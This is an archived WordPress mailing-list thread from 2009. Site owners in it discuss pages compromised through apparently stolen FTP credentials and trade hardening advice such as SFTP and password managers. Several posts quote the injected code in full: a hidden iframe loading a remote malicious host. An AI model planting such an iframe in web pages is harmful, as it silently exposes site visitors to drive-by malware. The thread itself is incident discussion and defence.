Re: [wp-testers] Default.widgets.php Hacked? What to do?
another advice : stop using ftp , use sftp insteadblock suspicious IPs On Fri, Jul 24, 2009 at 7:39 AM, Navjot Singh navjotjsi...@gmail.comwrote: File permissions were normal as it would be on any Normal wordpress install i.e. 644. On Fri, Jul 24, 2009 at 02:01:14AM +0530, Navjot Singh wrote: How to prevent further hacking? I am currently replacing all the files And what were the file permissions? -- Hal Yeah, I found that funny too. Thank god users of my site didn't have to mark my site as infected with virus as the whole website didn't work! On Fri, Jul 24, 2009 at 3:20 AM, Chris Cartercarter.ch...@gmail.com wrote: ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :) -Chris 314media.com ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
While I know that there are viruses that can steal your FTP credentials from common software programs, are you sure that that is what is going on here? The most commonplace method I've seen to inject this sort of thing into files is simple shared hosting with poor security practices. Once a hacker gets into one site on the server, he can run a script that simply searches for *.php or *.html and injects his code into anything it finds. Thus he's got his code on dozens or hundreds of sites instantly. Make the script run every so often, and you keep getting hacked over and over again. Solution in this case is two fold: 1. Correct the permissions. 755 or 644 for everything. Unfortunately, sometimes this is ineffective (poor security config tends to be *really* poor). 2. Switch hosts to one that knows what they're doing. While I don't doubt that people have gotten hacked based on stolen FTP creds, it seems more likely to me that this sort of code injection is done via bad shared hosting instead. -Otto ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue: * Malicious “Income” IFrames from .CN Domains http://bit.ly/NgWFA * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53 That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server. Chris Jean http://gaarai.com/ http://wp-roadmap.com/ http://dnsyogi.com/ Otto wrote: While I know that there are viruses that can steal your FTP credentials from common software programs, are you sure that that is what is going on here? The most commonplace method I've seen to inject this sort of thing into files is simple shared hosting with poor security practices. Once a hacker gets into one site on the server, he can run a script that simply searches for *.php or *.html and injects his code into anything it finds. Thus he's got his code on dozens or hundreds of sites instantly. Make the script run every so often, and you keep getting hacked over and over again. Solution in this case is two fold: 1. Correct the permissions. 755 or 644 for everything. Unfortunately, sometimes this is ineffective (poor security config tends to be *really* poor). 2. Switch hosts to one that knows what they're doing. While I don't doubt that people have gotten hacked based on stolen FTP creds, it seems more likely to me that this sort of code injection is done via bad shared hosting instead. -Otto ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
According to me Hostgator where I am hosted should be a good host or is it too vulnerable? Shifting is currently not feasible but I am hardening the security. Confirmed from Hostgator that it was a FTP hack. Hostgator gave me only the IP address of the spammer. It was being changed constantly. It kept logging out and logging in and downloaded index.php files, made the change and uploaded. It logged out after changing one file. Don't know if blocking those ips would be of any help. Regards Navjot Singh On Fri, Jul 24, 2009 at 6:54 PM, Ottoo...@ottodestruct.com wrote: While I know that there are viruses that can steal your FTP credentials from common software programs, are you sure that that is what is going on here? The most commonplace method I've seen to inject this sort of thing into files is simple shared hosting with poor security practices. Once a hacker gets into one site on the server, he can run a script that simply searches for *.php or *.html and injects his code into anything it finds. Thus he's got his code on dozens or hundreds of sites instantly. Make the script run every so often, and you keep getting hacked over and over again. Solution in this case is two fold: 1. Correct the permissions. 755 or 644 for everything. Unfortunately, sometimes this is ineffective (poor security config tends to be *really* poor). 2. Switch hosts to one that knows what they're doing. While I don't doubt that people have gotten hacked based on stolen FTP creds, it seems more likely to me that this sort of code injection is done via bad shared hosting instead. -Otto ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites. --Jennifer Chris Jean wrote: I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue: * Malicious “Income” IFrames from .CN Domains http://bit.ly/NgWFA * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53 That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server. -- Jennifer Hodgdon * Poplar ProductivityWare www.poplarware.com Drupal, WordPress, and custom Web programming ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Of course it is, but there's definitely a balance between security and convenience. I just checked, and I have 33 sites (including login/pass) stored in my FTP software (all sites I work on regularly). There's no way I would remember them all unless I made them all the same (also bad). It's even worse in my browser, I have 160 save logins (although not all of those are sites I have admin on, and I don't save them for banks, etc). It's not the most secure, but for me it's right mix of security and convenience (since I have control of my system that stores those and have decent security practices on it). Jennifer Hodgdon wrote: Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites. --Jennifer ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
http://keepass.info/ Am 24.07.2009, 17:36 Uhr, schrieb Aaron D. Campbell aa...@xavisys.com: Of course it is, but there's definitely a balance between security and convenience. I just checked, and I have 33 sites (including login/pass) stored in my FTP software (all sites I work on regularly). There's no way I would remember them all unless I made them all the same (also bad). It's even worse in my browser, I have 160 save logins (although not all of those are sites I have admin on, and I don't save them for banks, etc). It's not the most secure, but for me it's right mix of security and convenience (since I have control of my system that stores those and have decent security practices on it). Jennifer Hodgdon wrote: Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites. --Jennifer -- Tom Klingenberg lastflood GmbH Leibnizstr. 24 55118 Mainz Deutschland Fon: +49 6131 672250 Fax: +49 6131 604232 Web: www.lastflood.com Register: HRB 40173 am Amtsgericht Mainz; Geschäftsführung: Tom Klingenberg ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I also, as a rule, don't store passwords locally. The single exception to this is FileZilla (Windows install) as it seems to give me no choice in the matter. And since it sends FTP login data to the server in plain text anyway does it really matter as long as your firewall and anti-malware protection is fully up to date? This is for local protection only since you can't do a damn thing once you hit the Connect button in FileZilla and your login data is out there for everyone to see. And for these folks who found their sites had been hacked, what OS were they running? If Windows, we're they properly protected (firewall? Anti-malware program? Which brand?) Just thinking out loud there... Just on the off-chance that this has affected my Windows machine and possibly any blogs I administer via FTP (all on the same host) I did a full anti-malware scan on my Windows partition and thoroughly checked the sites I administer and everything's clean. One thing I have to wonder about though. On a Windows (desktop) system would using Windows Encrypting File System (EFS) to encrypt the FileZilla (settings) folder and it's .xml files help prevent this type of thing from happening locally? On 7/24/2009 10:09 AM, Jennifer Hodgdon wrote: Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites. --Jennifer Chris Jean wrote: I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue: * Malicious “Income” IFrames from .CN Domains http://bit.ly/NgWFA * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53 That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Better still, I have switched to using SFTP loggins everytime. Atleast it provides more safety than sending passwords in plain-text. On Sat, Jul 25, 2009 at 1:02 AM, Kirk Mkmb4...@gmail.com wrote: I also, as a rule, don't store passwords locally. The single exception to this is FileZilla (Windows install) as it seems to give me no choice in the matter. And since it sends FTP login data to the server in plain text anyway does it really matter as long as your firewall and anti-malware protection is fully up to date? This is for local protection only since you can't do a damn thing once you hit the Connect button in FileZilla and your login data is out there for everyone to see. And for these folks who found their sites had been hacked, what OS were they running? If Windows, we're they properly protected (firewall? Anti-malware program? Which brand?) Just thinking out loud there... Just on the off-chance that this has affected my Windows machine and possibly any blogs I administer via FTP (all on the same host) I did a full anti-malware scan on my Windows partition and thoroughly checked the sites I administer and everything's clean. One thing I have to wonder about though. On a Windows (desktop) system would using Windows Encrypting File System (EFS) to encrypt the FileZilla (settings) folder and it's .xml files help prevent this type of thing from happening locally? On 7/24/2009 10:09 AM, Jennifer Hodgdon wrote: Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites. --Jennifer Chris Jean wrote: I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue: * Malicious “Income” IFrames from .CN Domains http://bit.ly/NgWFA * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53 That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Using SFTP or SCP to administer blogs are the safest and will protect you from people sniffing your LAN/WLAN. As for storing passwords in browsers, FTP clients, etc. I would recommend http://www.keepassx.org/ same as KeePass that was mentioned earlier but open source and cross platform. Let's you store all your password in an encrypted file. So you got all your passwords ready to copy-and-paste after typing one password. Encrypted File System (EFS) will not help against viruses, as the filesystem is unencrypted while it's running. It's only good as long as the computer is off, but is very good to have if your laptop gets stolen. But everything helps. In my case I always use highly random passwords that I copy-and-paste from KeePassX. I use Linux that still isn't as targeted as Windows (yet). And I ALWAYS administer the sites using secure channels like SFTP, SSH, SCP, or HTTPS as long it's possible. Better still, I have switched to using SFTP loggins everytime. Atleast it provides more safety than sending passwords in plain-text. On Sat, Jul 25, 2009 at 1:02 AM, Kirk Mkmb4...@gmail.com wrote: I also, as a rule, don't store passwords locally. The single exception to this is FileZilla (Windows install) as it seems to give me no choice in the matter. And since it sends FTP login data to the server in plain text anyway does it really matter as long as your firewall and anti-malware protection is fully up to date? This is for local protection only since you can't do a damn thing once you hit the Connect button in FileZilla and your login data is out there for everyone to see. And for these folks who found their sites had been hacked, what OS were they running? If Windows, we're they properly protected (firewall? Anti-malware program? Which brand?) Just thinking out loud there... Just on the off-chance that this has affected my Windows machine and possibly any blogs I administer via FTP (all on the same host) I did a full anti-malware scan on my Windows partition and thoroughly checked the sites I administer and everything's clean. One thing I have to wonder about though. On a Windows (desktop) system would using Windows Encrypting File System (EFS) to encrypt the FileZilla (settings) folder and it's .xml files help prevent this type of thing from happening locally? On 7/24/2009 10:09 AM, Jennifer Hodgdon wrote: Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites. --Jennifer Chris Jean wrote: I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue: * Malicious âeuro;oelig;Incomeâeuro; IFrames from .CN Domains http://bit.ly/NgWFA * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53 That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I am using Roboform instead of KeePass. On Sat, Jul 25, 2009 at 2:34 AM, Andréan...@thehook.eu wrote: Using SFTP or SCP to administer blogs are the safest and will protect you from people sniffing your LAN/WLAN. As for storing passwords in browsers, FTP clients, etc. I would recommend http://www.keepassx.org/ same as KeePass that was mentioned earlier but open source and cross platform. Let's you store all your password in an encrypted file. So you got all your passwords ready to copy-and-paste after typing one password. Encrypted File System (EFS) will not help against viruses, as the filesystem is unencrypted while it's running. It's only good as long as the computer is off, but is very good to have if your laptop gets stolen. But everything helps. In my case I always use highly random passwords that I copy-and-paste from KeePassX. I use Linux that still isn't as targeted as Windows (yet). And I ALWAYS administer the sites using secure channels like SFTP, SSH, SCP, or HTTPS as long it's possible. Better still, I have switched to using SFTP loggins everytime. Atleast it provides more safety than sending passwords in plain-text. On Sat, Jul 25, 2009 at 1:02 AM, Kirk Mkmb4...@gmail.com wrote: I also, as a rule, don't store passwords locally. The single exception to this is FileZilla (Windows install) as it seems to give me no choice in the matter. And since it sends FTP login data to the server in plain text anyway does it really matter as long as your firewall and anti-malware protection is fully up to date? This is for local protection only since you can't do a damn thing once you hit the Connect button in FileZilla and your login data is out there for everyone to see. And for these folks who found their sites had been hacked, what OS were they running? If Windows, we're they properly protected (firewall? Anti-malware program? Which brand?) Just thinking out loud there... Just on the off-chance that this has affected my Windows machine and possibly any blogs I administer via FTP (all on the same host) I did a full anti-malware scan on my Windows partition and thoroughly checked the sites I administer and everything's clean. One thing I have to wonder about though. On a Windows (desktop) system would using Windows Encrypting File System (EFS) to encrypt the FileZilla (settings) folder and it's .xml files help prevent this type of thing from happening locally? On 7/24/2009 10:09 AM, Jennifer Hodgdon wrote: Doesn't anyone besides me think it is a poor security practice to store FTP credentials on their PC at all? I realize it is a bit inconvenient at times to have to remember passwords, but if your FTP software is storing credentials in an unencrypted file, I think it is a HUGE security risk to let it store your FTP passwords. This also goes for your browser storing login passwords for your sites. --Jennifer Chris Jean wrote: I did a lot of reading on this subject to ensure that I knew the full scope of it. It's quite clear to me that the stolen FTP credentials are definitely the cause of this specific issue: * Malicious âeuro;oelig;Incomeâeuro; IFrames from .CN Domains http://bit.ly/NgWFA * Hidden CN Iframes Are Still Prevalent http://bit.ly/12uY53 That said, you are quite right that getting a virus on your local machine isn't the only problem. It is very important for WordPress users to be aware that their site can be compromised by poor security practices on or off their server. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
[wp-testers] Default.widgets.php Hacked? What to do?
I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
yikes! Not good. Hope there's a patch soon. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Sorry to mention..blog was on 2.8.1...didn't got time to upgrade...now upgrading. On Fri, Jul 24, 2009 at 2:17 AM, Paleo Pattpblogedi...@gmail.com wrote: yikes! Not good. Hope there's a patch soon. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Oh Whew! My heart was racing there for a second... :D On Thu, Jul 23, 2009 at 4:50 PM, Navjot Singh navjotjsi...@gmail.comwrote: Sorry to mention..blog was on 2.8.1...didn't got time to upgrade...now upgrading. On Fri, Jul 24, 2009 at 2:17 AM, Paleo Pattpblogedi...@gmail.com wrote: yikes! Not good. Hope there's a patch soon. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
What version of wordpress are you running? -- From: Chris Carter carter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To: wp-testers@lists.automattic.com Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Saw this on WP.org http://wordpress.org/support/topic/281767 Looks like a grumbman virus .. scan every PC you're using to FTP ... This happened to a WP site of mine that I accessed FTP on my sister's PC Fucking virusues ... It apparently searches for FTP cridentals, then transmits them.. change your FTP PWD. On Thu, Jul 23, 2009 at 3:52 PM, Paleo Pat tpblogedi...@gmail.com wrote: Oh Whew! My heart was racing there for a second... :D On Thu, Jul 23, 2009 at 4:50 PM, Navjot Singh navjotjsi...@gmail.com wrote: Sorry to mention..blog was on 2.8.1...didn't got time to upgrade...now upgrading. On Fri, Jul 24, 2009 at 2:17 AM, Paleo Pattpblogedi...@gmail.com wrote: yikes! Not good. Hope there's a patch soon. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Carter carter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To: wp-testers@lists.automattic.com Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.comwrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Carter carter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To: wp-testers@lists.automattic.com Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Yeah..my Wordpress mu install also got hacked. Just confirmed. On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote: I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.comwrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Carter carter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To: wp-testers@lists.automattic.com Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IP's are strange Anyway, This virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected) Also might want to check your CGI-BIN for files that look suspicious It's basically is a bot that logs in, finds any files in all directories that start with the above ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :) -Chris 314media.com On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh navjotjsi...@gmail.comwrote: Yeah..my Wordpress mu install also got hacked. Just confirmed. On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote: I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.com wrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Carter carter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To: wp-testers@lists.automattic.com Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
